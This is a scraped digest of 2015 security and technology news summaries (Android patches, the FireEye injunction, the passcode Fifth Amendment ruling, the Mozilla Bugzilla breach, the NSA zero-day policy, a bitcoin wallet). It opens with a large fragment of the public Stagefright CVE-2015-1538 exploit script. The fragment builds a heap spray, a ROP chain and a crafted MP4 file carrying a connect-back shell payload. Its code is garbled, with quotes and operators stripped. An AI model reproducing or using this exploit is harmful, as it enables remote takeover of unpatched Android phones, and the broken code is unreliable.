PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00   # Add some identifiable stuff, just in case something goes awry...   rop_start_off = 0x34   x = rop_start_off + len(rop)   while len(rop)  0x80  rop_start_off:       rop += struct.pack(L, 0xf0f00000+x)       x += 4   # Add the native payload...   rop += buf   return rop## Build an mp4 that exploits CVE-2015-1538 #1## We mimic meow.3gp here...#def create_mp4(sp_addr, newpc_val, cb_host, cb_port):   chunks = []   # Build the MP4 header...   ftyp =  mp42   ftyp += struct.pack(L, 0)   ftyp += mp42   ftyp += isom   chunks.append(make_chunk(ftyp, ftyp))   # Note, this causes a few allocations...   moov_data =    moov_data += make_chunk(mvhd,       struct.pack(LL, 0, 0x41414141) +       (B * 0x5c) )   # Add a minimal, verified trak to satisfy mLastTrack being set   moov_data += make_chunk(trak,       make_chunk(stbl,           make_stsc(0x28, 0x28) +           make_stco() +           make_stsz() +           make_stts() ))   # Spray the heap using a large tx3g chunk (can contain binary data!

- )         0x4007004e _ZNK7android7RefBase9decStrongEPKv+2:   ldr r4, [r0, #4]  ; load mRefs      0x40070050 _ZNK7android7RefBase9decStrongEPKv+4:   mov r5, r0      0x40070052 _ZNK7android7RefBase9decStrongEPKv+6:   mov r6, r1      0x40070054 _ZNK7android7RefBase9decStrongEPKv+8:   mov r0, r4      0x40070056 _ZNK7android7RefBase9decStrongEPKv+10:  blx 0x40069884    ; atomic_decrement      0x4007005a _ZNK7android7RefBase9decStrongEPKv+14:  cmp r0, #1        ; must be 1      0x4007005c _ZNK7android7RefBase9decStrongEPKv+16:  bne.n   0x40070076 _ZNK7android7RefBase9decStrongEPKv+42      0x4007005e _ZNK7android7RefBase9decStrongEPKv+18:  ldr r0, [r4, #8]  ; load refs-mBase      0x40070060 _ZNK7android7RefBase9decStrongEPKv+20:  ldr r1, [r0, #0]  ; load mBase._vptr      0x40070062 _ZNK7android7RefBase9decStrongEPKv+22:  ldr r2, [r1, #12] ; load method address      0x40070064 _ZNK7android7RefBase9decStrongEPKv+24:  mov r1, r6      0x40070066 _ZNK7android7RefBase9decStrongEPKv+26:  blx r2            ; call it!      page =    off = 0  # the offset to the next object   off += 8   page += struct.pack(L, sp_addr + 8 + 16 + 8 + 12  28)    # _vptr.RefBase (for when we smash mDataSource)   page += struct.pack(L, sp_addr + off) # mRefs   off += 16   page += struct.pack(L, 1)             # mStrong   page += struct.pack(L, 0xc0dedbad)    # mWeak   page += struct.pack(L, sp_addr + off) # mBase   page += struct.pack(L, 16)            # mFlags (dont set OBJECT_LIFETIME_MASK)   off += 8   page += struct.pack(L, sp_addr + off) # the mBase _vptr.RefBase   page += struct.pack(L, 0xf00dbabe)    # mBase.mRefs (unused)   off += 16   page += struct.pack(L, 0xc0de0000 + 0x00)  # vtable entry 0   page += struct.pack(L, 0xc0de0000 + 0x04)  # vtable entry 4   page += struct.pack(L, 0xc0de0000 + 0x08)  # vtable entry 8   page += struct.pack(L, newpc_val)          # vtable entry 12   rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)   x = len(page)   while len(page)  4096:       page += struct.pack(L, 0xf0f00000+x)       x += 4   off = 0x34   page = page[:off] + rop + page[off+len(rop):]   spray = page * (((2*1024*1024) / len(page))  20)   moov_data += make_chunk(tx3g, spray)   block = A * 0x1c   bigger = B * 0x40   udta = make_chunk(udta,       make_chunk(meta,           struct.pack(L, 0) +           make_chunk(ilst,               make_chunk(cpil,    make_chunk(data, struct.pack(LL, 21, 0) + A)) +               make_chunk(trkn,    make_chunk(data, struct.pack(LL, 0, 0) + AAAABBBB)) +               make_chunk(disk,    make_chunk(data, struct.pack(LL, 0, 0) + AAAABB)) +               make_chunk(covr,    make_chunk(data, struct.pack(LL, 0, 0) + block)) * 32 +               make_chunk(\xa9alb, make_chunk(data, struct.pack(LL, 0, 0) + block)) +               make_chunk(\xa9ART, make_chunk(data, struct.pack(LL, 0, 0) + block)) +               make_chunk(aART,    make_chunk(data, struct.pack(LL, 0, 0) + block)) +               make_chunk(\xa9day, make_chunk(data, struct.pack(LL, 0, 0) + block)) +               make_chunk(\xa9nam, make_chunk(data, struct.pack(LL, 0, 0) + block)) +               make_chunk(\xa9wrt, make_chunk(data, struct.pack(LL, 0, 0) + block)) +               make_chunk(gnre,    make_chunk(data, struct.pack(LL, 1, 0) + block)) +               make_chunk(covr,    make_chunk(data, struct.pack(LL, 0, 0) + block)) * 32 +               make_chunk(\xa9ART, make_chunk(data, struct.pack(LL, 0, 0) + bigger)) +               make_chunk(\xa9wrt, make_chunk(data, struct.pack(LL, 0, 0) + bigger)) +               make_chunk(\xa9day, make_chunk(data, struct.pack(LL, 0, 0) + bigger)))           )       )   moov_data += udta   # Make the nasty trak   tkhd1 = .join([       \x00,       # version       D * 3,      # padding       E * (5*4),  # {c,m}time, id, ?

- ?       struct.pack(LLLLLL,           0x10000,  # a00           0,        # a01           0,        # dx           0,        # a10           0x10000,  # a11           0),       # dy       G * 0x14       ])   trak1 =    trak1 += make_chunk(tkhd, tkhd1)   mdhd1 = .join([       \x00,       # version       D * 0x17,   # padding       ])   mdia1 =    mdia1 += make_chunk(mdhd, mdhd1)   mdia1 += make_chunk(hdlr, F * 0x3a)   dinf1 =    dinf1 += make_chunk(dref, H * 0x14)   minf1 =    minf1 += make_chunk(smhd, G * 0x08)   minf1 += make_chunk(dinf, dinf1)   # Build the nasty sample table to trigger the vulnerability here.   stbl1 = make_stsc(3, (0x1200 / 0xc)  1, sp_addr, True) # TRIGGER   # Add the stbl to the minf chunk   minf1 += make_chunk(stbl, stbl1)   # Add the minf to the mdia chunk   mdia1 += make_chunk(minf, minf1)   # Add the mdia to the track   trak1 += make_chunk(mdia, mdia1)   # Add the nasty track to the moov data   moov_data += make_chunk(trak, trak1)   # Finalize the moov chunk   moov = make_chunk(moov, moov_data)   chunks.append(moov)   # Combine outer chunks together and voila.   data = .join(chunks)   return dataif __name__ == __main__:   import sys   import mp4   import argparse   def write_file(path, content):       with open(path, wb) as f:           f.write(content)   def addr(sval):       if sval.startswith(0x):           return int(sval, 16)       return int(sval)   # The address of a fake StrongPointer object (sprayed)   sp_addr   = 0x41d00010  # takju @ imm76i  2MB (via hangouts)   # The address to of our ROP pivot   newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs   # Allow the user to override parameters   parser = argparse.ArgumentParser()   parser.add_argument(-c, connectback-host, dest=cbhost, default=31.3.3.7)   parser.add_argument(-p, connectback-port, dest=cbport, type=int, default=12345)   parser.add_argument(-s, spray-address, dest=spray_addr, type=addr, default=None)   parser.add_argument(-r, rop-pivot, dest=rop_pivot, type=addr, default=None)   parser.add_argument(-o, output-file, dest=output_file, default=cve-2015-1538-1.mp4)   args = parser.parse_args()   if len(sys.argv) == 1:       parser.print_help()       sys.exit(1)   if args.spray_addr == None:       args.spray_addr = sp_addr   if args.rop_pivot == None:       args.rop_pivot = newpc_val   # Build the MP4 file...   data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)   print([*] Saving crafted MP4 to %s ... % args.output_file)   write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf

[https://packetstormsecurity.com/files/133521/androidstagefright-exec.txt](https://packetstormsecurity.com/files/133521/androidstagefright-exec.txt)

.footnote[2015-09-12 11:48:17 - Mobile]

---

## In brief: Android security updates, FireEye hushes infosec bod, Feds blab UK school IT vuln

- Vulture nybbles Google has emitted its first monthly batch of security updates for the latest version of Android  as promised in early August. The web giant vowed to regularly release fixes for vulnerabilities after it was rocked by the Stagefright bug that affected potentially hundreds of millions of devices. The first patch batch is detailed in this mailing-list post here, dated September 9, and new builds of Android 5.1.1 are available now for Nexus handhelds. Its up to carriers to sling the updates out to subscribers (T-Mobile US has, for one, already started doing so) or savvy fandroids can install the new OS themselves by hand. The following bugs have been squished in the update:

- We encourage all customers to accept these updates to their devices.  Google stresses that Android features various mitigations  such as Address Space Layout Randomization (ASLR) and SafetyNet  that should thwart attacks by malware, although it must be said, these are not infallible, so patch if you can.

- The document was redacted at the request of FireEye after the researchers contacted the IT giant to share their work and get the bugs fixed. After some discussions back and forth, FireEye went to a court in Hamburg, Germany, to obtain an injunction ordering Wilhelm to not reveal any extra information about the webMPS flaws in London on September 10. Let me state here that we fully understand FireEyes desire to protect their intellectual property, and of course we adhere to the respective laws, ERNWs Enno Rey wrote in a blog post about the debacle on Thursday. Its just  we never had the intention to violate that anyway, and we had abided by (both virtual and physical) handshake several times that nothing would be published without mutual agreement.

- Its Education Pro product allows staff to remotely control and monitor PCs in classrooms and labs. Back in July, someone called Slipstream went public with details of a rather embarrassing vulnerability in the code that allowed him to log into systems using a hardcoded password. Impero responded by threatening to sue Slipstream for copyright infringement by revealing the inner workings of the software.

- Slip responded by yanking his research off GitHub and Twitter. Now the US Department of Homeland Securitys Computer Emergency Readiness Team (CERT) has posted full details of the design flaw under the heading: Impero Education Pro classroom management software vulnerable to remote code execution. Good luck ceasendesisting Uncle Sam. And finally An American physics professor accused by the FBI of sending confidential blueprints for semiconductor lab equipment to China has had all charges against him dropped  after it turned out the schematics he supposedly leaked did not detail said equipment.

[http://www.theregister.co.uk/2015/09/12/roundup_android_fireeye_impero/](http://www.theregister.co.uk/2015/09/12/roundup_android_fireeye_impero/)

.footnote[2015-09-12 11:39:12 - Mobile]

---

## Smartphone passcodes protected by the Fifth Amendment  US court

- The Feds cant make suspects give up their company-issued smartphone passcodes because doing so violates the Fifth Amendment of the US Constitution. So ruled Judge Mark Kearney of the federal court in East Pennsylvania in the case of Securities and Exchange Commission v Huang, an insider-trading case brought against two ex-Capital One bank workers.

- The two ex-analysts are accused of using the financial institutions internal records to make stock market bets on as many as 170 companies, which turned a $150,000 stake into $2.8m of investments. Capital One gave the two staffers smartphones but, as a security measure, let them pick the passcodes themselves.

- When the duo were fired by their bosses they handed back the mobiles, which the SEC  Americas financial watchdog  wants to access to check for evidence. The Pennsylvania court ruled on Wednesday that forcing the pair to unlock the passcode-protected devices would violate their constitutional rights  specifically the Fifth Amendment, which spells out the right against self-incrimination. We find, as the SEC is not seeking business records but defendants personal thought processes, defendants may properly invoke their Fifth Amendment right, the judge wrote in his analysis [PDF]. Absent waiver of the confidentiality attendant to this personal thought process, we cannot find the personal passcodes to the Banks smartphones to be corporate records falling under the collective entity cases.

- Since theres no way for the SEC to prove that incriminating documents are on the handsets, the agency cant force defendants to hand over their codes. Oddly enough, this wouldnt be an issue if the smartphones in question used a fingerprint access system, rather than a passcode.

- A passcode is a thought process, which does get Fifth Amendment protection, whereas a biometric identifier is out in the open. The SEC is bound to appeal the case and go to a higher court on this one.

[http://www.theregister.co.uk/2015/09/25/us_court_rules_phone_passcodes_are_protected_by_the_fifth_amendment/](http://www.theregister.co.uk/2015/09/25/us_court_rules_phone_passcodes_are_protected_by_the_fifth_amendment/)

.footnote[2015-09-30 00:48:48 - Mobile]

---

## Qualcomm's new Snapdragon 820 chipset will enable LTE-U in phones starting in 2016

- Qualcomm said the LTE-U capabilities in its "X12 LTE" modem will boost downlink speeds by using carrier aggregation to bond together licensed LTE channels and LTE signals on unlicensed spectrum

- next year, and if customers are on a network that supports LTE-U, users "may experience a sudden boost in LTE speeds in areas that normally suffer from congestion."

- Verizon Wireless (NYSE: VZ) and T-Mobile US (NYSE:TMUS) have both said they intend to launch commercial LTE services into unlicensed spectrum starting next year.

[http://www.fiercewireless.com/story/qualcomms-new-snapdragon-820-chipset-will-enable-lte-u-phones-starting-2016/2015-09-15](http://www.fiercewireless.com/story/qualcomms-new-snapdragon-820-chipset-will-enable-lte-u-phones-starting-2016/2015-09-15)

.footnote[2015-09-30 00:30:47 - Mobile]

---

## Linux Foundation releases PARANOID internal infosec guide

- He says the guidelines should be adjusted if they are out of step with organisational risk appetites. The first section covers buying hardware and lists SecureBoot as a critical feature, and a lack of firewire and Thunderbolt ports as as a bonus.

- Here password-protected UEFI boot mode is a must. An admins operating system distro of choice has to meet a dozen critical requirements around fast patching, verification, and native disk encryption.

- The latter must include Linux Unified Key Setup full disk encryption, including swap, an unprivileged admin group account, and lots of robust passwords. The hardened Linux geek will need to globally disable firewire and Thunderbolt modules where they exist, filter incoming ports with firewalls, disable shd, and schedule automatic updates. To be a fully-paranoid neckbeard, admins must install rkhunter and an intrusion detection system, and, crucially, maintain it (including running checks from a trusted environment). Firefox is your browser of choice for accessing trusted sites.

- Admins should outfit their Chromium plow with Privacy Badger and HTTPS Everywhere (this correspondent recommends ScriptSafe to fully ruin the shininess and ad revenues of websites). Chrome should also be dumped in a VM where possible, a configuration that is surprisingly workable if RAM-intensive, so says Ryabitsev. The doc suggests VMs to compartmentalise applications, and points to the the Qubes-OS project as a suitable environment. Password managers are a good idea; separate password managers for untrusted and trusted browsers are even better for the paranoid trophy seekers. The guide does not touch on hardware data destruction, but robotics engineer zoz has offered some tips for the slightly nervous to fully paranoid.

- The easy way is to remove disk platters with a couple of Torx screwdrivers, rubbing with a rare earth magnet, crushing in a manner offering the admin the most gratification, burning with fire, and dispersal among city limits. Truely paranoid admins seeking GCHQ Five Eyes-assured obliteration will need to dabble in thermal, serious kinetic, and electric means of hard drive destruction.

[http://www.theregister.co.uk/2015/08/31/harden_like_linux_foundation/](http://www.theregister.co.uk/2015/08/31/harden_like_linux_foundation/)

.footnote[2015-09-04 03:48:14 - Infosec]

---

## Cyber crims up the ante with Google Play brainteaser malware

- Android malware bundled in an intelligence-testing game has been published to the official Google Play Store, not once but twice, claiming hundreds of thousands of victims in the process.

- led BrainTest were able to bypass Googles security scanning of mobile apps using a range of techniques.

[http://www.theregister.co.uk/2015/09/22/braintest_android_rootkit_brainteaser_malware/](http://www.theregister.co.uk/2015/09/22/braintest_android_rootkit_brainteaser_malware/)

.footnote[2015-09-23 23:17:33 - Infosec]

---

## ISIS hackers intercept top secret British Government emails in major security breach uncovered by GCHQ

-  Rex Features ISIS hackers intercept top secret British Government ISIS hackers intercept top secret British Government emails in major security breach uncovered by GCHQ. An investigation by the intelligence agency has discovered that extremists linked to ISIS have been targeting information held by some of David Camerons most senior ministers, including Theresa May, the Home Secretary. The extremists could have discovered events that government figures and members of the Royal family were expected to attend as a result of the hacking. It is understood that at least one of the plots ringleaders was killed by a drone strike in an operation disclosed by the Prime Minister this week. The recent cyber threat first emerged in a warning to Whitehall security officials in May and the plans to attack Britain were reportedly exposed by the GCHQ investigation. It is unclear what information the extremists were able to access, but it is understood that no security breaches occurred.

- However, officials were told to tighten security procedures, including changing passwords. The disclosure shows how the so-called war on terror has developed because of Isils cyber capabilities  computer hackers are known to have been recruited by the group to actively target the West. On Monday, it emerged that a British jihadist had been killed in Syria by UK forces after he directed a plot to kill the Queen.

[http://www.msn.com/en-gb/news/uknews/isis-hackers-intercept-top-secret-british-government-emails-in-major-security-breach-uncovered-by-gchq/ar-AAecITh](http://www.msn.com/en-gb/news/uknews/isis-hackers-intercept-top-secret-british-government-emails-in-major-security-breach-uncovered-by-gchq/ar-AAecITh)

.footnote[2015-09-12 20:10:05 - Infosec]

---

## Hackers spent at least a year spying on Mozilla to discover Firefox security holes  and exploit them

- Hackers have known about unpublicized and unpatched critical security holes in the Firefox web browser for a year or more  all by invading Mozillas systems. The Mozilla Foundation admitted on Friday that a privileged account on Firefoxs Bugzilla bug-tracking software has been compromised since at least September 2014.

- Said account, and thus the miscreants who gained access to it, could view the crucial non-public details of security bugs in Firefox that programmers were working on fixing. Information on these vulnerabilities is withheld so people cant write code to exploit the bugs to infect Firefox users with malware  if you have access to what the browsers developers are trying to fix, you know exactly how to attack the software and infiltrate victims computers. There are some indications that the attacker may have had access since September 2013, the nonprofit added in an FAQ [PDF] about the security breach. What that means is that even though Mozilla sought to conceal the bugs from the general public, information about critical bugs in Firefox has been known to potential cyber-criminals for months.

- This will have given crooks ample time to exploit the software blunders for fun and profit before the holes are patched. According to the FAQ, a total of 185 secret bugs leaked.

- Of those, Mozilla categorizes 53 as severe vulnerabilities. The oldest of those went unpatched for 335 or more days  meaning, Moz developers spent more than 11 months fixing that bug, and hackers had everything they needed to know to exploit it. Mozilla says 43 of these severe bugs had been patched in Firefox when the hackers broke in.

- The other 10 were not while the account was compromised. It is technically possible that any of these bugs could have been used to attack Firefox users in the vulnerability window, Mozilla says. Technicalities aside, the nonprofit admits it knows at least one of the bugs was definitely exploited, specifically a flaw that was patched on August 6. We are updating Bugzillas security practices to reduce the risk of future attacks of this type, Mozillas Richard Barnes wrote in a blog post on Friday. The term attack might be a bit generous, though, because it seems someone just had a password they shouldnt have had  maybe a weak one, or one reused on another compromised website, perhaps. As an immediate first step, all users with access to security-sensitive information have been required to change their passwords and use two-factor authentication, Barnes wrote. He added that Mozilla is reducing the number of people who have access to privileged information on the Bugzilla system and limiting what those people can do in future. We have notified the relevant law enforcement authorities about this incident, and may take additional steps based on the results of any further investigations, Barnes said. Mozilla tells us the latest version of Firefox  released last week  has addressed all the security vulnerabilities the Bugzilla invaders had access to.

[http://www.theregister.co.uk/2015/09/04/mozilla_firefox_bugzilla_leak/](http://www.theregister.co.uk/2015/09/04/mozilla_firefox_bugzilla_leak/)

.footnote[2015-09-12 11:47:30 - Infosec]

---

## Mind-blowing secrets of NSA's security exploit stockpile revealed at last

- PDF The NSA has revealed for the first time in public how it handles and reports critical unpatched security flaws its snoopers discover in software. It is generally accepted the US taxpayer-funded spy agency has a private stash of exploitable programming blunders that it uses to infect and monitor its intelligence targets computers and phones.

- Alerting app makers and IT giants to these holes, and getting them patched, could cost Uncle Sam some valuable information.

- The tech security world has been pressing to get some insight into the US governments zero-day policy. On Friday, we found out thanks to a successful Freedom of Information Act request from the Electronic Frontier Foundation (EFF). The obtained NSA document [full PDF] issued by the      advises government agencies on how to handle and report vulnerabilities in software used by agencies or the contracting companies they work with. The dossier, marked secret, explains how agencies can accomplish the US Department of Homeland Security-mandated cybersecurity task of    within the Joint Plan for the Coordination and Application of     . Among the processes explained is the governments Vulnerability Equities Process (VEP), a bunch of rules that covers      when      and    with       . The document  some parts marked as US-only, others for Americas Five Eyes partners  also says that government agencies and contractors should not immediately take their vulnerability discoveries to vendors, but instead notify             and consider the risks for    and  . Crucially,                                           . Meanwhile, flaws in NSA-certified hardware, software, and encryption algorithms should be reported to the NSA, which will handle things from there. Infosec bods were quick to share their thoughts on the newly unearthed government policies.  I got all excited about the release of docs re: the US govs vulnerability disclosure rules.

- pic.twitter.com/W5MKtwrJMc  Christopher Soghoian (@csoghoian) September 4, 2015 EFF staff attorney Andrew Crocker noted that in-between discussing      and explaining   , the document does provide some interesting clues on government security policy in regards to security vulnerabilities. If the government chooses to keep a vulnerability secret for intelligence purposes, for example, it does not notify the developer, which would likely otherwise issue a patch and protect users from online adversaries such as identity thieves or foreign governments who may also be aware of the zero-day, Crocker wrote. Thats why the US governments written policy on what to do with zero-days is so important. There is no word on whether further reports on the NSAs     will be forthcoming. Agency spokesperson   told El Reg:        .

-  Sponsored:  OpenStack for enterprise: The tipping point cometh 

[http://www.theregister.co.uk/2015/09/04/nsa_explains_handling_zerodays/](http://www.theregister.co.uk/2015/09/04/nsa_explains_handling_zerodays/)

.footnote[2015-09-12 11:47:20 - Infosec]

---

## BlockTrail Launches Multi-Platform Bitcoin Wallet With No Access To Your Coins

- Of the vault it notes: Coinbase has no ability to move funds (which means you are safe from Coinbase being hacked, going bankrupt, or anyone seizing your bitcoin).

- You dont want to be part of a financial system that keeps you hostage when they own your funds. The whole reason why people get into Bitcoin is to no longer be dependent on a bank, says BlockTrail CTO Ruben De Vries.

- Theres not that many big players that offer a good technology for the user and we think theres space for a product like ours which offers better security and stays true to Bitcoins values by allowing users to keep their private keys, he adds. From an operations point of view, BlockTrails decentralized approach is clearly a lot leaner than the likes of Coinbase  the team is only around six staff at this stage (vs Coinbases up to 250 circa 110 staff).

- And it also claims it does not need to shell out such big sums on regulation and compliance, and so doesnt need to have as much investor capital in the bank. [Coinbase] operates more like a bank.

- So thats why if we can use local partners... that allows us to get into that country quickly and without too much hassle. At this stage BlockTrail has a few such partnerships inked in Europe, and none in the U.S. as yet, so will be looking to build out this partnership network  assuming it can first galvanize a solid user-base behind another decentralized Bitcoin wallet play. This article was edited to clarify that Coinbase does offer a decentralized vault product, in addition to a Bitcoin wallet in which it holds the users encryption keys

[http://social.techcrunch.com/2015/09/12/blocktrail-does-a-bitcoin-wallet/](http://social.techcrunch.com/2015/09/12/blocktrail-does-a-bitcoin-wallet/)

.footnote[2015-09-12 11:38:03 - Dark]

---

